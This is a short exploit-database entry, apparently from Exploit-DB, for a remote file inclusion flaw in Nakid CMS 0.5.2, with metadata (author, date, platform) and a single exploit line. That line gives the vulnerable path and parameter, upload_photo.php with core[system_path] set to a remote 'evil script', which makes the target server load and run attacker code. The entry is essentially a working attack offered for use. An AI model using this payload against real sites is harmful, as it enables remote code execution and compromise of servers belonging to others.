Nakid CMS 0.5.2 - Remote File Inclusion

EDB-ID:

13889


Author:

sh00t0ut

Type:

webapps


Platform:

PHP

Date:

2010-06-16


[~] Nakid CMS 0.5.2 Remote Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]